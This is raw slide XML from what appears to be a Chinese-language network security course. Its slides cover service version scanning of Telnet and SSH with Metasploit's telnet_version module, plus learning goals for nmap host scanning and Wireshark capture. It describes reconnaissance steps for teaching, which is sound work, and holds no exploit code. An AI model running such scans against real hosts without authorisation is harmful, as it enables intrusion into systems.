                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Telnet服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292090" y="1662748"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.使用“exploit”或“run”命令运行telnet_version模块，如图2-4-21所示。从扫描结果可以看到，这台主机安装了Telnet服务。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292090" y="2630488"/>
            <a:ext cx="5276850" cy="2085975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="文本框 110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292090" y="4716463"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-21 运行telnet_version模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【学习目标】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="7602220" cy="1362075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>1.能够掌握nmap工具进行主机扫描。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2.能够使用Wirshark工具抓取数据包进行分析。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行SSH服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
